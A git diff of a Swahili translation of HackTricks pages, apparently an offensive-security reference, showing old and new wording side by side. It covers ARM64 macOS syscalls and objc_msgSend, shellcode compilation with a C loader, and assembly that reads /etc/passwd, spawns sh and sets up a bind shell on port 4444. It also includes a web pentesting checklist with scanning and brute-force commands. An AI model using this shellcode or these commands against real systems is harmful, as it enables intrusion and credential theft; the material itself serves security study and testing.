- Bit ya **`E`**: Inaonyesha **endianness**.
- Mode na Exception Mask Bits (0-4): Zinaamua hali ya sasa ya utekelezaji. Bit ya **5** inaonyesha ikiwa programu inaendesha kama 32bit (1) au 64bit (0). Nyingine 4 zinaonyesha **mode ya exception inayotumika sasa** (wakati exception inatokea na inashughulikiwa). Nambari iliyowekwa **inaonyesha kipaumbele cha sasa** au ikiwa exception nyingine itachochewa wakati hii inaendelea kushughulikiwa.
<figure><img src="../../../images/image (1200).png" alt=""><figcaption></figcaption></figure>
- **`AIF`**: Makosa fulani yanaweza kuzuiliwa kwa kutumia bits **`A`**, `I`, `F`. Ikiwa **`A`** ni 1 inamaanisha **kuondolewa kwa asynchronous** kutachochewa. **`I`** inasanidiwa kujibu **Interrupts Requests** (IRQs) za vifaa vya nje. na F inahusiana na **Fast Interrupt Requests** (FIRs).
- **`AIF`**: Exceptions fulani zinaweza kuzimwa kwa kutumia bits **`A`**, `I`, `F`. Ikiwa **`A`** ni 1 inamaanisha **asynchronous aborts** zitatolewa. **`I`** inasanidi kujibu Requests za Interrupt za vifaa vya nje (IRQs). na `F` inahusiana na Fast Interrupt Requests (FIRs).
## macOS
### BSD syscalls
Angalia [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master). BSD syscalls zitakuwa na **x16 > 0**.
Angalia [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master) au endesha `cat /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/sys/syscall.h`. BSD syscalls zitakuwa na **x16 > 0**.
### Mach Traps
Angalia katika [**syscall_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall_sw.c.auto.html) `mach_trap_table` na katika [**mach_traps.h**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/mach/mach_traps.h) prototypes. Nambari ya mex ya Mach traps ni `MACH_TRAP_TABLE_COUNT` = 128. Mach traps zitakuwa na **x16 < 0**, hivyo unahitaji kuita nambari kutoka orodha ya awali kwa **minus**: **`_kernelrpc_mach_vm_allocate_trap`** ni **`-10`**.
Angalia katika [**syscall_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall_sw.c.auto.html) `mach_trap_table` na katika [**mach_traps.h**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/mach/mach_traps.h) prototypes. mex number ya Mach traps ni `MACH_TRAP_TABLE_COUNT` = 128. Mach traps zitakuwa na **x16 < 0**, hivyo unahitaji kuita nambari kutoka kwenye orodha ya awali ukiweka **minus**: **`_kernelrpc_mach_vm_allocate_trap`** ni **`-10`**.
Unaweza pia kuangalia **`libsystem_kernel.dylib`** katika disassembler ili kupata jinsi ya kuita hizi (na BSD) syscalls:
Unaweza pia kuangalia **`libsystem_kernel.dylib`** katika disassembler ili kupata jinsi ya kuita syscalls hizi (na BSD):
```bash
# macOS
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
@ -325,32 +328,32 @@ dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Lib
# iOS
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64
```
Kumbuka kwamba **Ida** na **Ghidra** zinaweza pia ku-decompile **dylibs maalum** kutoka kwenye cache kwa kupitisha tu cache hiyo.
Kumbuka kwamba **Ida** na **Ghidra** pia zinaweza ku-decompile **specific dylibs** kutoka cache kwa kupitisha cache.
> [!TIP]
> Wakati mwingine ni rahisi kuangalia **code iliyodecompiled** kutoka **`libsystem_kernel.dylib`** **kuliko** kuangalia **source code** kwa sababu code ya syscalls kadhaa (BSD na Mach) inazalishwa kupitia scripts (angalia maoni katika source code) wakati katika dylib unaweza kupata kile kinachoitwa.
> Wakati mwingine ni rahisi kukagua msimbo wa **decompiled** kutoka **`libsystem_kernel.dylib`** **than** kukagua **source code** kwa sababu msimbo wa syscalls kadhaa (BSD na Mach) unazalishwa kupitia scripts (check comments in the **source code**) wakati katika dylib unaweza kupata kinachoitwa.
### machdep calls
XNU inasaidia aina nyingine ya calls inayoitwa machine dependent. Nambari za calls hizi zinategemea usanifu na wala calls au nambari hazihakikishiwi kubaki kuwa thabiti.
XNU inasaidia aina nyingine ya miito inayoitwa machine dependent. Idadi ya miito hii inategemea architecture na wala miito wala nambari hazihakikishiwi kubaki thabiti.
### comm page
Hii ni ukurasa wa kumbukumbu ya mmiliki wa kernel ambao umewekwa kwenye anwani ya kila mchakato wa mtumiaji. Imepangwa kufanya mpito kutoka kwa hali ya mtumiaji hadi nafasi ya kernel kuwa haraka kuliko kutumia syscalls kwa huduma za kernel ambazo zinatumika sana kiasi kwamba mpito huu ungekuwa usio na ufanisi.
Hii ni kernel owner memory page ambayo ime-mapped kwenye address scape ya kila process ya mtumiaji. Inalenga kufanya mabadiliko kutoka user mode kwenda kernel space yawe haraka kuliko kutumia syscalls kwa huduma za kernel zinazotumika mara nyingi kiasi kwamba mabadiliko hayo yangekuwa yasiyefaa sana.
Kwa mfano, wito wa `gettimeofdate` unasoma thamani ya `timeval` moja kwa moja kutoka kwenye comm page.
Kwa mfano call `gettimeofdate` husoma thamani ya `timeval` moja kwa moja kutoka comm page.
### objc_msgSend
Ni kawaida sana kupata kazi hii ikitumika katika programu za Objective-C au Swift. Kazi hii inaruhusu kuita njia ya kitu cha objective-C.
Ni kawaida sana kupata function hii ikitumika katika programu za Objective-C au Swift. Function hii inaruhusu kuitisha method ya objective-C object.
Parameta ([maelezo zaidi katika docs](https://developer.apple.com/documentation/objectivec/1456712-objc_msgsend)):
Parameters ([more info in the docs](https://developer.apple.com/documentation/objectivec/1456712-objc_msgsend)):
- x0: self -> Pointer kwa mfano
- x1: op -> Mchoro wa njia
- x2... -> Mabaki ya hoja za njia iliyoitwa
- x0: self -> Pointer to the instance
- x1: op -> Selector of the method
- x2... -> Rest of the arguments of the invoked method
Hivyo, ikiwa utaweka breakpoint kabla ya tawi la kazi hii, unaweza kwa urahisi kupata kile kinachoitwa katika lldb (katika mfano huu, kitu kinaita kitu kutoka `NSConcreteTask` ambacho kitakimbiza amri):
Basi, ikiwa utaweka breakpoint kabla ya branch kuelekea function hii, unaweza kwa urahisi kuona ni nini kinachoitwa kwenye lldb kwa (katika mfano huu object inaita object kutoka `NSConcreteTask` ambayo ita-run command):
```bash
# Right in the line were objc_msgSend will be called
(lldb) po $x0
@ -369,31 +372,31 @@ whoami
)
```
> [!TIP]
> Kuweka variable ya env **`NSObjCMessageLoggingEnabled=1`** inawezekana kuandika wakati kazi hii inaitwa katika faili kama `/tmp/msgSends-pid`.
> Kwa kuweka env variable **`NSObjCMessageLoggingEnabled=1`**, inawezekana kufanya **log** wakati function hii inaitwa katika faili kama `/tmp/msgSends-pid`.
>
> Zaidi ya hayo, kuweka **`OBJC_HELP=1`** na kuita binary yoyote unaweza kuona variable nyingine za mazingira ambazo unaweza kutumia ku **log** wakati vitendo fulani vya Objc-C vinatokea.
> Zaidi ya hayo, kwa kuweka **`OBJC_HELP=1`** na kuendesha binary yoyote utaona environment variables nyingine ambazo unaweza kutumia ku-**log** wakati vitendo fulani vya Objc-C vinapotokea.
Wakati kazi hii inaitwa, inahitajika kupata njia iliyoitwa ya mfano ulioonyeshwa, kwa hili utafutaji tofauti hufanywa:
Wakati function hii inaitwa, inahitajika kupata method iliyoitwa ya instance iliyobainishwa; kwa ajili yake hufanywa tafutizi mbalimbali:
- Fanya utafutaji wa cache wa matumaini:
- Ikiwa ni mafanikio, imekamilika
- Pata runtimeLock (kusoma)
- Fanya uchunguzi wa optimistic cache lookup:
- Ikifanikiwa, imemalizika
- Chukua runtimeLock (read)
- Ikiwa (realize && !cls->realized) realize class
- Ikiwa (initialize && !cls->initialized) initialize class
- Jaribu cache ya darasa lenyewe:
- Ikiwa ni mafanikio, imekamilika
- Jaribu orodha ya mbinu za darasa:
- Ikiwa imepatikana, jaza cache na umalize
- Jaribu cache ya darasa la mzazi:
- Ikiwa ni mafanikio, imekamilika
- Jaribu orodha ya mbinu za darasa la mzazi:
- Ikiwa imepatikana, jaza cache na umalize
- Ikiwa (resolver) jaribu mtafutaji wa mbinu, na rudia kutoka utafutaji wa darasa
- Ikiwa bado hapa (= kila kitu kingine kimefeli) jaribu forwarder
- Jaribu cache ya class yenyewe:
- Ikifanikiwa, imemalizika
- Jaribu orodha ya method za class:
- Iwapo imepatikana, jaza cache na imemalizika
- Jaribu cache ya superclass:
- Ikifanikiwa, imemalizika
- Jaribu orodha ya method za superclass:
- Iwapo imepatikana, jaza cache na imemalizika
- Ikiwa (resolver) jaribu method resolver, na rudia kutoka class lookup
- Ikiwa bado uko hapa (= all else has failed) jaribu forwarder
### Shellcodes
Ili kukusanya:
Ili ku-compile:
```bash
as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
@ -408,7 +411,7 @@ for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ;
echo -n '\\x'$c
done
```
Kwa macOS mpya:
Kwa macOS mpya zaidi:
```bash
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/fc0742e9ebaf67c6a50f4c38d59459596e0a6c5d/helper/extract.sh
for s in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
@ -417,7 +420,7 @@ done
```
<details>
<summary>Code ya C ya kujaribu shellcode</summary>
<summary>C code ili kujaribu shellcode</summary>
```c
// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
// gcc loader.c -o loader
@ -467,7 +470,7 @@ return 0;
#### Shell
Imechukuliwa kutoka [**hapa**](https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/shell.s) na kufafanuliwa.
Imechukuliwa kutoka [**here**](https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/shell.s) na imeelezewa.
{{#tabs}}
{{#tab name="with adr"}}
@ -539,7 +542,7 @@ sh_path: .asciz "/bin/sh"
#### Soma na cat
Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni array ya param (ambayo katika kumbukumbu inamaanisha stack ya anwani).
Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni an array ya params (ambayo katika memory inamaanisha stack ya addresses).
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
@ -565,7 +568,7 @@ cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"
```
#### Wito amri na sh kutoka kwa fork ili mchakato mkuu usiuwe.
#### Endesha amri kwa sh kupitia fork ili mchakato mkuu usifariki
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
@ -611,7 +614,7 @@ touch_command: .asciz "touch /tmp/lalala"
```
#### Bind shell
Bind shell kutoka [https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s) katika **port 4444**
Bind shell kutoka [https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s) kwenye **port 4444**
```armasm
.section __TEXT,__text
.global _main

161
src/network-services-pentesting/pentesting-web/README.md
View File

@ -2,11 +2,11 @@
{{#include ../../banners/hacktricks-training.md}}
## Habari za Msingi
## Taarifa Msingi
Huduma ya wavuti ni huduma ya **kawaida zaidi na yenye wigo mpana**, na kuna **aina nyingi tofauti za udhaifu**.
Huduma ya web ni huduma ya **kawaida zaidi na yenye upana mkubwa**, na kuna aina nyingi tofauti za **vulnerabilities**.
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
**Port ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
PORT STATE SERVICE
80/tcp open http
@ -24,38 +24,38 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0
web-api-pentesting.md
{{#endref}}
## Muhtasari wa Mbinu
## Muhtasari wa Methodolojia
> Katika mbinu hii tutadhania kuwa unamshambulia domain (au subdomain) moja tu. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyothibitishwa ndani ya upeo.
> Katika methodolojia hii tutadhani kuwa utashambulia domain (au subdomain) na hiyo pekee. Kwa hivyo, unapaswa kutumia methodolojia hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambuliwa ndani ya wigo.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumiwa na web server. Tafuta **mbinu** za kuzingatia wakati wa mtihani wa baadaye ikiwa utaweza kutambua tech kwa ufanisi.
- [ ] Kuna **known vulnerability** yoyote ya toleo la teknolojia?
- [ ] Unatumia **well known tech** yoyote? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Anzisha **general purposes scanners**. Hujui kama zitatokea kitu au kama zitatoka taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote zinazowezekana, **folders** na **parameters being used.** Pia, angalia kwa **special findings**.
- [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
- [ ] **Directory Brute-Forcing**: Jaribu ku-brute force folda zote zilizogunduliwa ukitafuta faili mpya na directory mpya.
- [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **discovered files** ukiongeza extensions za kawaida za backup.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta hidden parameters**.
- [ ] Mara utakapokuwa ume**identified** endpoints zote zinazowezekana zinazokubali **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii ya ukaguzi](../../pentesting-web/web-vulnerabilities-methodology.md)
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **mbinu** za kuzingatia wakati wa mtihani mzima ikiwa unaweza kutambua teknolojia hiyo.
- [ ] Je, kuna **udhaifu unaojulikana** katika toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **mbinu muhimu** za kupata taarifa zaidi?
- [ ] Je, kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Anzisha **general purposes scanners**. Haujui kama zitatoka na kitu au kupata taarifa ya kuvutia.
- [ ] Anza na **ukaguzi wa awali**: **robots**, **sitemap**, **404 error** na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote, folda na **parameta zinazotumika.** Pia, angalia **uvumbuzi maalum**.
- [ ] _Kumbuka kwamba kila wakati saraka mpya inapotambulika wakati wa brute-forcing au spidering, inapaswa kuspider._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta **faili** na **saraka** mpya.
- [ ] _Kumbuka kwamba kila wakati saraka mpya inapotambuliwa wakati wa brute-forcing au spidering, inapaswa kufanywa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona ikiwa unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongeza viambatisho vya backup vinavyojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta parameta zilizofichwa**.
- [ ] Mara unapokuwa umewataja yote **endpoints** zinazokubali **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
## Toleo la Server (Je, lina udhaifu?)
## Server Version (Je lina udhaifu?)
### Tambua
Angalia kama kuna **known vulnerabilities** kwa server **toleo** linaloendesha.\
**HTTP headers and cookies of the response** zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kubaini server toleo, lakini pia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)au [**https://builtwith.com/**](https://builtwith.com)**:**
Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la server linaloendesha.\
Vichwa vya **HTTP** na **cookies** za majibu vinaweza kuwa vya msaada mkubwa kutambua **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb), [**webtech**](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com) zinaweza kuwa za msaada:
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
webanalyze -host https://google.com -crawl 2
```
Tafuta **for** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
Tafuta **kwa** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
### **Angalia kama kuna WAF**
@ -63,9 +63,9 @@ Tafuta **for** [**vulnerabilities of the web application** **version**](../../ge
- [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
- [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
### Mbinu za teknolojia za wavuti
### Mbinu za teknolojia za Web
Baadhi ya **tricks** za **finding vulnerabilities** katika teknolojia mbalimbali zinazojulikana zinazotumika:
Baadhi ya **mbinu** za **kutafuta udhaifu** katika **teknolojia** mbalimbali zinazotumika:
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
@ -101,28 +101,27 @@ Baadhi ya **tricks** za **finding vulnerabilities** katika teknolojia mbalimbali
- [**Wordpress**](wordpress.md)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
_Kumbuka kwamba the **same domain** inaweza kutumia **different technologies** katika tofauti **ports**, **folders** na **subdomains**._\
Kama web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
_Tafadhali zingatia kwamba **domeni ile ile** inaweza kutumia **teknolojia tofauti** katika **bandari**, **folda** na **subdomains** tofauti._\
Ikiwa programu ya wavuti inatumia **tech/platform** yoyote iliyotajwa hapo juu au **nyingine yoyote**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
### Mapitio ya Source Code
### Ukaguzi wa Source Code
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na wewe kufanya mwenyewe **White box test** ya application, kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** inayofanywa sasa:
- Je, kuna **Change-log or Readme or Version** file au kitu chochote chenye **version info accessible** via web?
- Je, **credentials** zimehifadhiwa vipi na wapi? Kuna (inayopatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko kwa **plain text**, **encrypted** au ni gani **hashing algorithm** inayotumika?
- Je, inatumia **master key** kwa ku-encrypt kitu? Ni **algorithm** gani inayotumika?
- Je, unaweza **access any of these files** kwa kutumia vulnerability fulani?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (labda some **password introduced inside an old commit**)?
Ikiwa **source code** ya programu inapatikana kwenye **github**, mbali na kufanya mwenyewe **White box test** ya programu, kuna **taarifa** ambazo zinaweza kuwa **zitumike** kwa ajili ya sasa ya **Black-Box testing**:
- Je, kuna faili ya **Change-log or Readme or Version** au kitu chochote chenye **version info accessible** kupitia wavuti?
- Je, vipi na wapi zinahifadhiwa **credentials**? Je, kuna faili (inayopatikana?) yenye **credentials** (majina ya watumiaji au passwords)?
- Je, passwords ziko kwa **plain text**, **encrypted**, au ni algorithm gani ya **hashing** inayotumika?
- Je, inatumia **master key** yoyote kwa **encrypting** kitu? Ni **algorithm** gani inayotumika?
- Je, unaweza kufikia faili zozote kati ya hizi kwa **exploiting** udhaifu wowote?
- Je, kuna taarifa za kuvutia kwenye **github** (issues zilizotatuliwa na zisizotatuliwa)? Au katika **commit history** (labda password ilizingirwa ndani ya commit ya zamani)?
{{#ref}}
code-review-tools.md
{{#endref}}
### Skana za otomatiki
### Automatic scanners
#### Skana za otomatiki za madhumuni ya jumla
#### General purpose automatic scanners
```bash
nikto -h <URL>
whatweb -a 4 <URL>
@ -136,7 +135,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi
```
#### Vichunguzi vya CMS
Ikiwa CMS inatumiwa usisahau **kuendesha skana**, labda utapata kitu kitamu:
Ikiwa CMS inatumiwa usisahau **kukimbiza skana**, huenda ikapatikana kitu cha kuvutia:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
@ -149,13 +148,13 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za web server inayotumiwa na mteja (ikiwa data yoyote imetolewa) na baadhi ya mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati umebaini hata CMS na kukimbia scanner.
> Kwa wakati huu unapaswa tayari kuwa na baadhi ya habari kuhusu web server inayotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati, umeweza hata kugundua CMS na kuendesha scanner.
## Hatua kwa hatua za ugunduzi wa Web Application
## Ugunduzi wa Web Application Hatua kwa Hatua
> Kuanzia sasa tutaanza kuingiliana na web application.
> Tangu hapa tutaanza kuingiliana na web application.
### Uchunguzi wa awali
### Ukaguzi wa awali
**Kurasa za default zenye taarifa za kuvutia:**
@ -164,30 +163,30 @@ joomlavs.rb #https://github.com/rastating/joomlavs
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni kwenye kurasa kuu na za pili.
- Angalia pia maoni (comments) kwenye kurasa kuu na za sekondari.
**Kulazimisha makosa**
**Kusababisha makosa**
Web servers zinaweza **kutenda kinyume cha kawaida** wakati data ya kushangaza inapotumwa kwao. Hii inaweza kufungua **vulnerabilities** au kusababisha **disclosure** ya taarifa nyeti.
Web servers zinaweza **kutenda kwa njia isiyotab predictable** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **tadhaa** au **kufichua taarifa nyeti**.
- Access **fake pages** like /whatever_fake.php (.aspx,.html,.etc)
- **Add "\[]", "]]", and "\[\["** in **cookie values** and **parameter** values to create errors
- Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
- Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
- Fikia **kurasa za uongo** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[\["** katika **cookie values** na **parameter** values ili kuunda makosa
- Tengeneza kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **HTTP Verbs** tofauti kama PATCH, DEBUG au zenye makosa kama FAKE
#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
#### **Angalia kama unaweza kupakia files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
Kama utagundua kuwa **WebDav** iko **imewezeshwa** lakini huna ruhusa za kutosha za **kupakia files** kwenye folder la root jaribu:
- **Brute Force** credentials
- **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
- **Upload files** kupitia WebDav kwenye **sehemu zilizobaki** za **found folders** ndani ya ukurasa wa wavuti. Huenda una ruhusa za kupakia files katika folda nyingine.
### **SSL/TLS vulnerabilites**
- If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
- If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
- Ikiwa application **hainatii matumizi ya HTTPS** katika sehemu yoyote, basi iko **hatarini kwa MitM**
- Ikiwa application inatuma data nyeti (passwords) kutumia HTTP. Hii ni hatari kubwa.
Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kukagua **vulnerabilities** (Katika programu za Bug Bounty labda aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) kwa kukagua tena vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
@ -203,7 +202,7 @@ Information about SSL/TLS vulnerabilities:
### Spidering
Anzisha aina fulani ya **spider** ndani ya wavuti. Lengo la spider ni **kupata njia nyingi iwezekanavyo** kutoka kwa application inayojaribiwa. Kwa hiyo, web crawling na vyanzo vya nje vinapaswa kutumika ili kupata njia nyingi halali iwezekanavyo.
Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
@ -235,7 +234,7 @@ Anzisha aina fulani ya **spider** ndani ya wavuti. Lengo la spider ni **kupata n
### Brute Force directories and files
Anza **brute-forcing** kutoka kwenye folda ya root na hakikisha unafanya **brute-force** kwa **direktori zote zilizopatikana** ukitumia **hii method** na direktorisi zote **zilizoonekana** kwa **Spidering** (unaweza kufanya brute-forcing **kikamilifu** na kuongeza mwanzoni mwa wordlist iliyotumika majina ya direktorisi zilizopatikana).\
Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** (you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories).\
Tools:
- **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
@ -268,41 +267,41 @@ Tools:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Kumbuka kwamba kila wakati direktorisi mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Forced._
_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
### What to check on each file found
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Mara utakapopata faili zote, tafuta backups za faili zote za executable ("_.php_", "_.aspx_"...). Mabadiliko ya kawaida ya majina ya backup ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: Unaweza kutumia tools kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameters zilizofichwa. Ikiwa utaweza, jaribu kutafuta** hidden parameters kwenye kila executable web file.
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
- _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
- _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
- **Comments:** Angalia comments za faili zote, unaweza kupata **credentials** au **hidden functionality**.
